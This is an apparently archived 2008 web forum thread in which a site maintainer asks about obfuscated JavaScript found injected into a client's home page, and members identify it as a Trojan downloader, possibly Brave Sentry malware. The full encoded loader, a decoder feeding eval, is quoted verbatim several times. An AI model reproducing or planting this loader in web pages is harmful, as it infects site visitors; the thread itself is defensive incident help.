Mystery Source Code

Edward · Apr 3, 2008

Can anyone tell me what this is....

<body style="background-image: url(bgrnd_home.jpg); background-attachment:
fixed;"><script language=JavaScript>function fban(x){var
l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,49,7,57,18,32,24,1,55,27,0,0,0,0,0,0,44,4,14,0,53,8,61,42,48,13,29,33,6,11,56,36,19,39,58,60,43,22,25,59,9,31,34,0,0,0,0,37,0,45,40,41,5,35,46,38,47,12,54,26,15,21,20,51,52,23,30,17,28,3,62,50,10,16,2);for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){{w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(193^w&255);w>>=8;s-=2}else{s=6}}}eval(r);}}fban('jZRT_RGahM9a5UMawwh3dRRTOkfv_RGbpwxchUWWjBMGD4kRg8lGQBMb@4kNhzxTOw0cNPGFj2f@oxx0eQkaDLWvfWfc5UMcDukcwvvTOUTWDRf0gTBe5U9GhlTTpvkccoEbDgRWozRT_RxTcevRHPlv3qlRG9vcNPGFj9fRglrNjZkcDgx0wMhSKQxcbkkGDwYF32f@DZ9TOw0N_ZG@1jxbNf0Tfvxce0Y0feRcozxTOvh3bu')</script>

.....The background is a genuine image but that is all I recognise.

This is off the webiste's Home page which has been uploaded by the website's
owner since I originally published it. She has been having a few problems
which I have managed to resolve but this bit is a mystery to me.

Can anyone help?

TIA

Ed

Ronx · Apr 3, 2008

It is javascript that calls up a website that downloads a Trojan onto
the computer. The script is malicious and must be removed. Your
client's PC and web site should also be disinfected.

Edward · Apr 3, 2008

Thanks, Ron.

I'll take care of it immediately.

Best wishes,

Ed

Ronx said:
It is javascript that calls up a website that downloads a Trojan onto the
computer. The script is malicious and must be removed. Your client's PC
and web site should also be disinfected.

--
Ron Symonds - Microsoft MVP (FrontPage)
Reply only to group - emails will be deleted unread.

http://www.rxs-enterprises.org/fp

Can anyone tell me what this is....

<body style="background-image: url(bgrnd_home.jpg);
background-attachment:
fixed;"><script language=JavaScript>function fban(x){var
l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,49,7,57,18,32,24,1,55,27,0,0,0,0,0,0,44,4,14,0,53,8,61,42,48,13,29,33,6,11,56,36,19,39,58,60,43,22,25,59,9,31,34,0,0,0,0,37,0,45,40,41,5,35,46,38,47,12,54,26,15,21,20,51,52,23,30,17,28,3,62,50,10,16,2);for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){{w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(193^w&255);w>>=8;s-=2}else{s=6}}}eval(r);}}fban('jZRT_RGahM9a5UMawwh3dRRTOkfv_RGbpwxchUWWjBMGD4kRg8lGQBMb@4kNhzxTOw0cNPGFj2f@oxx0eQkaDLWvfWfc5UMcDukcwvvTOUTWDRf0gTBe5U9GhlTTpvkccoEbDgRWozRT_RxTcevRHPlv3qlRG9vcNPGFj9fRglrNjZkcDgx0wMhSKQxcbkkGDwYF32f@DZ9TOw0N_ZG@1jxbNf0Tfvxce0Y0feRcozxTOvh3bu')</script>

....The background is a genuine image but that is all I recognise.

This is off the webiste's Home page which has been uploaded by the
website's
owner since I originally published it. She has been having a few problems
which I have managed to resolve but this bit is a mystery to me.

Can anyone help?

TIA

Ed

Click to expand...

Mike Mueller · Apr 3, 2008

Ron-
Can you break that down some time, so that others may see what is happening
in this script. It is beyond what I know of javascript

Ronx said:
It is javascript that calls up a website that downloads a Trojan onto the
computer. The script is malicious and must be removed. Your client's PC
and web site should also be disinfected.

--
Ron Symonds - Microsoft MVP (FrontPage)
Reply only to group - emails will be deleted unread.

http://www.rxs-enterprises.org/fp

Can anyone tell me what this is....

<body style="background-image: url(bgrnd_home.jpg);
background-attachment:
fixed;"><script language=JavaScript>function fban(x){var
l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,49,7,57,18,32,24,1,55,27,0,0,0,0,0,0,44,4,14,0,53,8,61,42,48,13,29,33,6,11,56,36,19,39,58,60,43,22,25,59,9,31,34,0,0,0,0,37,0,45,40,41,5,35,46,38,47,12,54,26,15,21,20,51,52,23,30,17,28,3,62,50,10,16,2);for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){{w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(193^w&255);w>>=8;s-=2}else{s=6}}}eval(r);}}fban('jZRT_RGahM9a5UMawwh3dRRTOkfv_RGbpwxchUWWjBMGD4kRg8lGQBMb@4kNhzxTOw0cNPGFj2f@oxx0eQkaDLWvfWfc5UMcDukcwvvTOUTWDRf0gTBe5U9GhlTTpvkccoEbDgRWozRT_RxTcevRHPlv3qlRG9vcNPGFj9fRglrNjZkcDgx0wMhSKQxcbkkGDwYF32f@DZ9TOw0N_ZG@1jxbNf0Tfvxce0Y0feRcozxTOvh3bu')</script>

....The background is a genuine image but that is all I recognise.

This is off the webiste's Home page which has been uploaded by the
website's
owner since I originally published it. She has been having a few problems
which I have managed to resolve but this bit is a mystery to me.

Can anyone help?

TIA

Ed

Click to expand...

Rob Giordano \(Crash\) · Apr 4, 2008

Looks like Brave Sentry malware...google it...but I would NOT go to their
website.

--
~~~~~~~~~~~~~~~~~~
Rob Giordano
Microsoft MVP Expression

| Ron-
| Can you break that down some time, so that others may see what is
happening
| in this script. It is beyond what I know of javascript
|
|
| | > It is javascript that calls up a website that downloads a Trojan onto
the
| > computer. The script is malicious and must be removed. Your client's
PC
| > and web site should also be disinfected.
| >
| > --
| > Ron Symonds - Microsoft MVP (FrontPage)
| > Reply only to group - emails will be deleted unread.
| >
| > http://www.rxs-enterprises.org/fp
| >
| >
| >
| >
| > | >
| >> Can anyone tell me what this is....
| >>
| >> <body style="background-image: url(bgrnd_home.jpg);
| >> background-attachment:
| >> fixed;"><script language=JavaScript>function fban(x){var
| >>
l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,49,7,57,18,32,24,1,55,27,0,0,0,0,0,0,44,4,14,0,53,8,61,42,48,13,29,33,6,11,56,36,19,39,58,60,43,22,25,59,9,31,34,0,0,0,0,37,0,45,40,41,5,35,46,38,47,12,54,26,15,21,20,51,52,23,30,17,28,3,62,50,10,16,2);for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){{w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(193^w&255);w>>=8;s-=2}else{s=6}}}eval(r);}}fban('jZRT_RGahM9a5UMawwh3dRRTOkfv_RGbpwxchUWWjBMGD4kRg8lGQBMb@4kNhzxTOw0cNPGFj2f@oxx0eQkaDLWvfWfc5UMcDukcwvvTOUTWDRf0gTBe5U9GhlTTpvkccoEbDgRWozRT_RxTcevRHPlv3qlRG9vcNPGFj9fRglrNjZkcDgx0wMhSKQxcbkkGDwYF32f@DZ9TOw0N_ZG@1jxbNf0Tfvxce0Y0feRcozxTOvh3bu')</script>
| >>
| >> ....The background is a genuine image but that is all I recognise.
| >>
| >> This is off the webiste's Home page which has been uploaded by the
| >> website's
| >> owner since I originally published it. She has been having a few
problems
| >> which I have managed to resolve but this bit is a mystery to me.
| >>
| >> Can anyone help?
| >>
| >> TIA
| >>
| >> Ed
| >
|

Ronx · Apr 4, 2008

I'll look over the weekend. Rob's post may be more useful.

--
Ron Symonds - Microsoft MVP (FrontPage)
Reply only to group - emails will be deleted unread.

http://www.rxs-enterprises.org/fp

Ronx said:
Ron-
Can you break that down some time, so that others may see what is happening
in this script. It is beyond what I know of javascript

Ronx said:

It is javascript that calls up a website that downloads a Trojan onto the
computer. The script is malicious and must be removed. Your client's PC
and web site should also be disinfected.

--
Ron Symonds - Microsoft MVP (FrontPage)
Reply only to group - emails will be deleted unread.

http://www.rxs-enterprises.org/fp

Can anyone tell me what this is....

<body style="background-image: url(bgrnd_home.jpg);
background-attachment:
fixed;"><script language=JavaScript>function fban(x){var
l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,49,7,57,18,32,24,1,55,27,0,0,0,0,0,0,44,4,14,0,53,8,61,42,48,13,29,33,6,11,56,36,19,39,58,60,43,22,25,59,9,31,34,0,0,0,0,37,0,45,40,41,5,35,46,38,47,12,54,26,15,21,20,51,52,23,30,17,28,3,62,50,10,16,2);for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){{w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(193^w&255);w>>=8;s-=2}else{s=6}}}eval(r);}}fban('jZRT_RGahM9a5UMawwh3dRRTOkfv_RGbpwxchUWWjBMGD4kRg8lGQBMb@4kNhzxTOw0cNPGFj2f@oxx0eQkaDLWvfWfc5UMcDukcwvvTOUTWDRf0gTBe5U9GhlTTpvkccoEbDgRWozRT_RxTcevRHPlv3qlRG9vcNPGFj9fRglrNjZkcDgx0wMhSKQxcbkkGDwYF32f@DZ9TOw0N_ZG@1jxbNf0Tfvxce0Y0feRcozxTOvh3bu')</script>

....The background is a genuine image but that is all I recognise.

This is off the webiste's Home page which has been uploaded by the
website's
owner since I originally published it. She has been having a few problems
which I have managed to resolve but this bit is a mystery to me.

Can anyone help?

TIA

Ed

Click to expand...

Click to expand...

Mystery Source Code

Edward

Ronx

Edward

Mike Mueller

Rob Giordano \(Crash\)

Ronx